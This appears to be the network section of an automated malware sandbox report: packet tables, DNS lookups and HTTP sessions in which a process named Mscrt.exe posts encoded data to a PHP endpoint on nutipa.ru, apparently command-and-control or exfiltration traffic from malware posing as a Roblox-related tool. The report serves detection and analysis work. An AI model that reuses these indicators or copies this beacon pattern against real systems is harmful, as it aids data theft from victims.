Dec 15, 2024 04:18:56.188903093 CET	49950	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:56.314388990 CET	80	49950	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:56.357434034 CET	49950	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:56.487703085 CET	49954	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:56.487797022 CET	49950	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:56.607503891 CET	80	49954	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:56.607825994 CET	80	49950	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:56.610224009 CET	49950	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:56.610336065 CET	49954	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:56.612104893 CET	49954	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:56.731794119 CET	80	49954	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:56.966826916 CET	49954	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:57.086906910 CET	80	49954	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:57.086942911 CET	80	49954	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:57.086977005 CET	80	49954	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:57.696187973 CET	80	49954	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:57.748040915 CET	49954	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:57.948188066 CET	80	49954	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:57.998064995 CET	49954	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:58.081497908 CET	49954	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:58.082283974 CET	49959	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:58.202018976 CET	80	49954	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:58.202147007 CET	80	49959	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:58.202167034 CET	49954	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:58.202547073 CET	49959	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:58.202738047 CET	49959	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:58.322473049 CET	80	49959	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:58.560544968 CET	49959	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:58.680654049 CET	80	49959	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:58.680674076 CET	80	49959	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:58.680686951 CET	80	49959	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:59.288470030 CET	80	49959	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:59.341913939 CET	49959	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:59.522898912 CET	80	49959	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:59.576064110 CET	49959	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:59.653383017 CET	49959	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:59.654459000 CET	49965	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:59.773621082 CET	80	49959	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:59.773683071 CET	49959	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:59.774200916 CET	80	49965	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:59.774281979 CET	49965	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:59.774457932 CET	49965	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:59.858098030 CET	49965	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:59.859175920 CET	49966	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:59.894145966 CET	80	49965	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:59.979018927 CET	80	49966	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:59.979087114 CET	49966	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:59.979240894 CET	49966	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:59.984091043 CET	49967	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:19:00.022840023 CET	80	49965	172.67.185.214	192.168.2.4
Dec 15, 2024 04:19:00.099004030 CET	80	49966	172.67.185.214	192.168.2.4
Dec 15, 2024 04:19:00.104074955 CET	80	49967	172.67.185.214	192.168.2.4
Dec 15, 2024 04:19:00.104159117 CET	49967	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:19:00.104394913 CET	49967	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:19:00.224214077 CET	80	49967	172.67.185.214	192.168.2.4
Dec 15, 2024 04:19:00.326196909 CET	49966	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:19:00.446034908 CET	80	49966	172.67.185.214	192.168.2.4
Dec 15, 2024 04:19:00.446059942 CET	80	49966	172.67.185.214	192.168.2.4
Dec 15, 2024 04:19:00.452230930 CET	49967	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:19:00.572225094 CET	80	49967	172.67.185.214	192.168.2.4
Dec 15, 2024 04:19:00.572246075 CET	80	49967	172.67.185.214	192.168.2.4
Dec 15, 2024 04:19:00.572258949 CET	80	49967	172.67.185.214	192.168.2.4
Dec 15, 2024 04:19:00.666099072 CET	80	49965	172.67.185.214	192.168.2.4
Dec 15, 2024 04:19:00.666397095 CET	49965	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:19:01.064078093 CET	80	49966	172.67.185.214	192.168.2.4
Dec 15, 2024 04:19:01.108511925 CET	49966	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:19:01.188997984 CET	80	49967	172.67.185.214	192.168.2.4
Dec 15, 2024 04:19:01.232317924 CET	49967	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:19:01.308027029 CET	80	49966	172.67.185.214	192.168.2.4
Dec 15, 2024 04:19:01.357306004 CET	49966	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:19:01.422833920 CET	80	49967	172.67.185.214	192.168.2.4
Dec 15, 2024 04:19:01.466803074 CET	49967	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:19:01.543230057 CET	49966	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:19:01.543276072 CET	49967	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:19:01.543958902 CET	49971	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:19:01.663688898 CET	80	49966	172.67.185.214	192.168.2.4
Dec 15, 2024 04:19:01.663753033 CET	80	49971	172.67.185.214	192.168.2.4
Dec 15, 2024 04:19:01.663861036 CET	49966	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:19:01.663924932 CET	80	49967	172.67.185.214	192.168.2.4
Dec 15, 2024 04:19:01.663934946 CET	49971	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:19:01.663989067 CET	49967	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:19:01.664143085 CET	49971	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:19:01.783868074 CET	80	49971	172.67.185.214	192.168.2.4
Dec 15, 2024 04:19:02.015698910 CET	49971	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:19:02.135715961 CET	80	49971	172.67.185.214	192.168.2.4
Dec 15, 2024 04:19:02.135752916 CET	80	49971	172.67.185.214	192.168.2.4
Dec 15, 2024 04:19:02.135782957 CET	80	49971	172.67.185.214	192.168.2.4
Dec 15, 2024 04:19:02.749865055 CET	80	49971	172.67.185.214	192.168.2.4
Dec 15, 2024 04:19:02.794924021 CET	49971	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:19:03.006068945 CET	80	49971	172.67.185.214	192.168.2.4
Dec 15, 2024 04:19:03.060540915 CET	49971	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:19:03.142503023 CET	49975	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:19:03.262315989 CET	80	49975	172.67.185.214	192.168.2.4
Dec 15, 2024 04:19:03.262409925 CET	49975	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:19:03.262584925 CET	49975	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:19:03.382266998 CET	80	49975	172.67.185.214	192.168.2.4
Dec 15, 2024 04:19:03.607428074 CET	49975	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:19:03.727421045 CET	80	49975	172.67.185.214	192.168.2.4
Dec 15, 2024 04:19:03.727452993 CET	80	49975	172.67.185.214	192.168.2.4
Dec 15, 2024 04:19:03.727463007 CET	80	49975	172.67.185.214	192.168.2.4
Dec 15, 2024 04:19:04.347100019 CET	80	49975	172.67.185.214	192.168.2.4
Dec 15, 2024 04:19:04.388572931 CET	49975	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:19:04.582813978 CET	80	49975	172.67.185.214	192.168.2.4
Dec 15, 2024 04:19:04.623147011 CET	49975	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:19:04.697694063 CET	49971	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:19:04.697738886 CET	49975	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:19:04.698446035 CET	49980	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:19:04.818114996 CET	80	49980	172.67.185.214	192.168.2.4
Dec 15, 2024 04:19:04.818280935 CET	49980	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:19:04.818300009 CET	80	49975	172.67.185.214	192.168.2.4
Dec 15, 2024 04:19:04.818470955 CET	49975	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:19:13.296689987 CET	49980	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:19:13.416538954 CET	80	49980	172.67.185.214	192.168.2.4
Dec 15, 2024 04:19:13.611010075 CET	80	49980	172.67.185.214	192.168.2.4
Dec 15, 2024 04:19:13.611255884 CET	49980	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:19:13.731287003 CET	80	49980	172.67.185.214	192.168.2.4
Dec 15, 2024 04:19:13.731338978 CET	80	49980	172.67.185.214	192.168.2.4
Dec 15, 2024 04:19:13.731355906 CET	80	49980	172.67.185.214	192.168.2.4
Dec 15, 2024 04:19:14.171199083 CET	80	49980	172.67.185.214	192.168.2.4
Dec 15, 2024 04:19:14.216706991 CET	49980	80	192.168.2.4	172.67.185.214

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 15, 2024 04:17:02.283098936 CET	57155	53	192.168.2.4	1.1.1.1
Dec 15, 2024 04:17:02.420996904 CET	53	57155	1.1.1.1	192.168.2.4
Dec 15, 2024 04:17:08.858892918 CET	61302	53	192.168.2.4	1.1.1.1
Dec 15, 2024 04:17:09.448077917 CET	53	61302	1.1.1.1	192.168.2.4
Dec 15, 2024 04:17:13.527169943 CET	56379	53	192.168.2.4	1.1.1.1
Dec 15, 2024 04:17:13.667773008 CET	53	56379	1.1.1.1	192.168.2.4
Dec 15, 2024 04:17:15.674299955 CET	54235	53	192.168.2.4	1.1.1.1
Dec 15, 2024 04:17:15.811395884 CET	53	54235	1.1.1.1	192.168.2.4
Dec 15, 2024 04:17:24.763355017 CET	54471	53	192.168.2.4	1.1.1.1
Dec 15, 2024 04:17:25.161633015 CET	53	54471	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 15, 2024 04:17:02.283098936 CET	192.168.2.4	1.1.1.1	0x75bb	Standard query (0)	getsolara.dev	A (IP address)	IN (0x0001)	false
Dec 15, 2024 04:17:08.858892918 CET	192.168.2.4	1.1.1.1	0xd2ce	Standard query (0)	clientsettings.roblox.com	A (IP address)	IN (0x0001)	false
Dec 15, 2024 04:17:13.527169943 CET	192.168.2.4	1.1.1.1	0xb2a7	Standard query (0)	www.nodejs.org	A (IP address)	IN (0x0001)	false
Dec 15, 2024 04:17:15.674299955 CET	192.168.2.4	1.1.1.1	0x644c	Standard query (0)	nodejs.org	A (IP address)	IN (0x0001)	false
Dec 15, 2024 04:17:24.763355017 CET	192.168.2.4	1.1.1.1	0xcc07	Standard query (0)	nutipa.ru	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 15, 2024 04:17:02.420996904 CET	1.1.1.1	192.168.2.4	0x75bb	No error (0)	getsolara.dev		104.21.93.27	A (IP address)	IN (0x0001)	false
Dec 15, 2024 04:17:02.420996904 CET	1.1.1.1	192.168.2.4	0x75bb	No error (0)	getsolara.dev		172.67.203.125	A (IP address)	IN (0x0001)	false
Dec 15, 2024 04:17:09.448077917 CET	1.1.1.1	192.168.2.4	0xd2ce	No error (0)	clientsettings.roblox.com	titanium.roblox.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 15, 2024 04:17:09.448077917 CET	1.1.1.1	192.168.2.4	0xd2ce	No error (0)	titanium.roblox.com	edge-term4.roblox.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 15, 2024 04:17:09.448077917 CET	1.1.1.1	192.168.2.4	0xd2ce	No error (0)	edge-term4.roblox.com	edge-term4-fra2.roblox.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 15, 2024 04:17:09.448077917 CET	1.1.1.1	192.168.2.4	0xd2ce	No error (0)	edge-term4-fra2.roblox.com		128.116.123.3	A (IP address)	IN (0x0001)	false
Dec 15, 2024 04:17:13.667773008 CET	1.1.1.1	192.168.2.4	0xb2a7	No error (0)	www.nodejs.org		104.20.22.46	A (IP address)	IN (0x0001)	false
Dec 15, 2024 04:17:13.667773008 CET	1.1.1.1	192.168.2.4	0xb2a7	No error (0)	www.nodejs.org		104.20.23.46	A (IP address)	IN (0x0001)	false
Dec 15, 2024 04:17:15.811395884 CET	1.1.1.1	192.168.2.4	0x644c	No error (0)	nodejs.org		104.20.23.46	A (IP address)	IN (0x0001)	false
Dec 15, 2024 04:17:15.811395884 CET	1.1.1.1	192.168.2.4	0x644c	No error (0)	nodejs.org		104.20.22.46	A (IP address)	IN (0x0001)	false
Dec 15, 2024 04:17:25.161633015 CET	1.1.1.1	192.168.2.4	0xcc07	No error (0)	nutipa.ru		172.67.185.214	A (IP address)	IN (0x0001)	false
Dec 15, 2024 04:17:25.161633015 CET	1.1.1.1	192.168.2.4	0xcc07	No error (0)	nutipa.ru		104.21.64.130	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

getsolara.dev

clientsettings.roblox.com

www.nodejs.org

nutipa.ru

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49743	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:17:25.288737059 CET	319	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 04:17:25.638724089 CET	344	OUT	Data Raw: 00 03 01 02 06 0b 04 06 05 06 02 01 02 00 01 07 00 04 05 0f 02 06 03 0c 07 07 0a 03 04 03 03 09 0a 0f 05 0c 00 01 06 0b 0c 56 04 06 06 00 07 00 03 03 0d 09 0c 05 04 0b 05 0e 06 53 07 0b 06 0b 02 07 0f 0a 04 01 06 01 0d 01 0b 02 0d 50 0c 04 06 0d Data Ascii: VSPWYQR\L}Ucy[wbvYwe\|kUyOt\|Q^k]Zy\|Q{cf}~hww^~e~V@{}T}\a
Dec 15, 2024 04:17:26.374568939 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:17:26.631629944 CET	1236	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:17:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BteJNiFYW03YMnRUbMR%2BmgaSM%2BThCIpuB4FvGUzMCf1sANsqVMcLgYS0LoGvhvzbgb0rUAQZCIWHePmYUt7sfLLclPMbsniuef3pSLlyJsbp6XG62%2BDzKOx3GSc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2347d6ee4478d6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4891&min_rtt=1800&rtt_var=6857&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=663&delivery_rate=55032&cwnd=146&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 35 32 30 0d 0a 56 4a 7d 5d 78 54 7c 59 78 71 74 48 7e 72 6b 00 6a 5e 60 54 6b 60 66 54 79 05 7f 59 7d 61 73 5c 60 63 58 50 7b 61 71 03 75 58 78 03 6a 4b 78 01 55 4b 72 50 63 62 70 58 7f 04 65 05 7f 59 62 40 79 65 77 52 7d 5a 67 4a 76 62 5c 5c 77 4f 61 48 7c 58 66 04 7d 42 5e 0a 7f 67 56 5a 75 76 7b 06 7c 5b 71 04 7c 60 5f 44 79 67 5e 43 78 77 78 42 7b 43 68 5c 6d 72 7f 5d 7b 63 6d 5d 7f 60 51 58 78 74 60 06 6a 62 63 03 62 71 64 04 7a 51 41 5b 68 74 68 0a 68 71 65 0d 75 7f 6c 06 7b 6f 6b 58 74 59 7a 0d 6e 62 79 01 7e 7c 69 5b 6f 61 62 4b 76 5d 67 03 62 62 64 04 74 71 7a 50 7e 5d 7a 06 77 5c 6d 05 76 65 68 09 7f 6c 66 5d 60 6f 68 04 7f 5d 6c 02 78 6c 63 03 7b 06 76 01 7c 6d 5e 08 77 74 7c 03 69 62 75 50 7e 6d 67 0a 7b 53 6d 5d 7e 71 7a 5a 7b 5d 46 51 6b 42 7f 52 69 5e 60 0d 69 67 76 4e 7b 43 56 5b 6f 62 77 58 7c 61 64 5e 6a 67 74 53 7c 5e 7d 0a 7a 5d 6b 58 7d 5c 60 46 60 05 65 51 7b 5c 79 44 75 48 5a 03 7d 48 64 02 7e 76 5f 08 77 72 73 4a 7f 4c 79 42 7f 49 76 0a 79 66 5e 41 7c 73 7b 02 76 62 6d 05 77 [TRUNCATED] Data Ascii: 520VJ}]xT\|YxqtH~rkj^`Tk`fTyY}as\`cXP{aquXxjKxUKrPcbpXeYb@yewR}ZgJvb\\wOaH\|Xf}B^gVZuv{\|[q\|`_Dyg^CxwxB{Ch\mr]{cm]`QXxt`jbcbqdzQA[hthhqeul{okXtYznby~\|i[oabKv]gbbdtqzP~]zw\mvehlf]`oh]lxlc{v\|m^wt\|ibuP~mg{Sm]~qzZ{]FQkBRi^`igvN{CV[obwX\|ad^jgtS\|^}z]kX}\`F`eQ{\yDuHZ}Hd~v_wrsJLyBIvyf^A\|s{vbmwOuaz~\|x}gcKwawJ{\_J}NyxYtM{Yhxm{yb^x]z\|`ZDxw\|~bgOv_lH}\|cIx\|_WvR\|x\|RIt`nNzaa\|\|bxOXKwsQIvOtwa\A~pbw\
Dec 15, 2024 04:17:26.631676912 CET	869	IN	Data Raw: 53 4d 75 75 74 08 7c 7c 53 4d 77 42 60 01 7c 73 52 4b 78 42 77 06 7a 70 76 49 7c 53 7c 40 77 77 68 03 7e 5c 50 0b 7c 6d 7b 42 78 43 54 03 7d 72 69 07 7c 4e 60 0a 7f 52 78 0d 7e 60 68 42 7c 67 5c 05 78 6d 63 07 7b 62 78 05 7c 5f 59 4b 7e 77 77 4f Data Ascii: SMuut\|\|SMwB`\|sRKxBwzpvI\|S\|@wwh~\P\|m{BxCT}ri\|N`Rx~`hB\|g\xmc{bx\|_YK~wwO\|^}OzsRrpwce{qawvh}vRfm@t\LW\|I~@yfpA~]IuL[vq}\|OX~Bt@}Ysv_sxrmI\|p}xI`ywZ{SsIzbtzsT{]NZod~L`Zurx~UcK\|Id\|qW@uB^ooxHv`ePy_y~z_z\yvxBa
Dec 15, 2024 04:17:26.706526995 CET	295	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 384 Expect: 100-continue
Dec 15, 2024 04:17:27.020796061 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:17:27.021024942 CET	384	OUT	Data Raw: 50 50 43 5f 5a 5a 58 5f 5d 5a 56 51 50 59 57 57 55 52 5e 44 5a 50 5b 5c 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: PPC_ZZX_]ZVQPYWWUR^DZP[\YY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^')="*/\""C?>( $[&!'=-$'=&\?0)U/.F'#P #
Dec 15, 2024 04:17:27.504381895 CET	945	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:17:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GYEYdRWFeg6zqPr8FjFeuNC8XtvuRNeMD5jQJDxLxOaeQ70TzQBWS%2BwDt2urYZcTslleZGht1qW9Qd%2BwRj5Ot29ZJQNfuQ99x6N9wt5ubobnn2ga0OgENr6GdUo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2347dae9c478d6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=6684&min_rtt=1800&rtt_var=8753&sent=7&recv=9&lost=0&retrans=0&sent_bytes=2155&recv_bytes=1342&delivery_rate=2306477&cwnd=150&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 06 1f 39 5c 23 29 39 0c 20 3e 34 54 39 02 21 53 28 56 23 19 26 22 0c 07 27 28 2f 5f 3e 3e 3b 1f 26 3a 31 12 23 0c 3d 50 3c 24 29 58 26 36 21 51 03 11 22 12 26 07 2c 10 3e 29 2c 14 32 31 34 07 24 2d 27 05 2a 38 26 50 26 2b 28 0e 37 00 28 52 2c 3a 2b 03 2b 14 2b 19 39 00 32 13 20 26 2e 53 0c 17 25 5c 3c 29 3e 5f 34 0b 35 51 24 3c 33 1e 20 07 29 0b 3d 33 0e 56 26 30 3c 0e 33 2d 3c 1a 20 20 0b 1b 25 3a 00 5b 20 31 3e 57 28 32 25 5c 20 05 2e 52 03 34 5d 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 989\#)9 >4T9!S(V#&"'(/_>>;&:1#=P<$)X&6!Q"&,>),214$-'*8&P&+(7(R,:+++92 &.S%\<)>_45Q$<3 )=3V&0<3-< %:[ 1>W(2%\ .R4]T0
Dec 15, 2024 04:17:27.531618118 CET	296	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 1424 Expect: 100-continue
Dec 15, 2024 04:17:27.846882105 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:17:27.847112894 CET	1424	OUT	Data Raw: 50 5e 46 5f 5a 5a 58 51 5d 5a 56 51 50 51 57 52 55 53 5e 49 5a 52 5b 5d 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: P^F_ZZXQ]ZVQPQWRUS^IZR[]YY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^$]+-)X6,-<3Z!,42-.\&:) $0.!(!,;.F'#P
Dec 15, 2024 04:17:28.321693897 CET	948	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:17:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L7r0y7ZfvE6NWeEVUDpl848QC3ikqIfg8pQYiNZgPSvhW1unh5MD0hiOCnKLaQnwJ62Caee0bC%2BD0o6rHQvuXGoKLjiOcJYQb1QkAh%2F7Wvur5iQxG1OlEHCNym0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2347e01ea578d6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=8338&min_rtt=1789&rtt_var=10348&sent=12&recv=14&lost=0&retrans=0&sent_bytes=3125&recv_bytes=3062&delivery_rate=2306477&cwnd=153&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 06 1f 39 5d 22 03 21 0b 21 3e 01 0d 2e 2f 3d 53 2b 33 3f 18 33 21 21 5b 33 38 09 5c 28 3d 0d 54 31 39 08 01 34 32 2a 0c 2b 37 22 00 24 26 21 51 03 11 21 07 26 10 3f 02 2a 2a 30 5a 31 31 27 19 25 3e 20 59 2a 3b 32 50 24 38 05 55 22 3e 24 53 2d 29 3c 1f 3c 3a 3f 14 2e 3d 2e 57 34 0c 2e 53 0c 17 25 1e 3c 29 21 03 37 0c 25 1d 27 02 37 52 23 29 2e 56 3d 33 20 55 27 0a 37 54 26 2e 30 56 35 33 29 19 32 03 3d 00 23 22 3e 57 3d 18 25 5c 20 05 2e 52 03 34 5d 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 989]"!!>./=S+3?3!![38\(=T1942+7"$&!Q!&?0Z11'%> Y;2P$8U">$S-)<<:?.=.W4.S%<)!7%'7R#).V=3 U'7T&.0V53)2=#">W=%\ .R4]T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49744	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:17:26.920830011 CET	296	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue
Dec 15, 2024 04:17:27.279264927 CET	2536	OUT	Data Raw: 55 52 43 51 5a 5c 5d 53 5d 5a 56 51 50 5a 57 55 55 51 5e 42 5a 55 5b 5f 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: URCQZ\]S]ZVQPZWUUQ^BZU[_YY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^$\(=_>;[5Z=)=;!,8'.1%.1T)+$.]=3>-;.F'#P /
Dec 15, 2024 04:17:28.008450031 CET	25	IN	HTTP/1.1 100 Continue
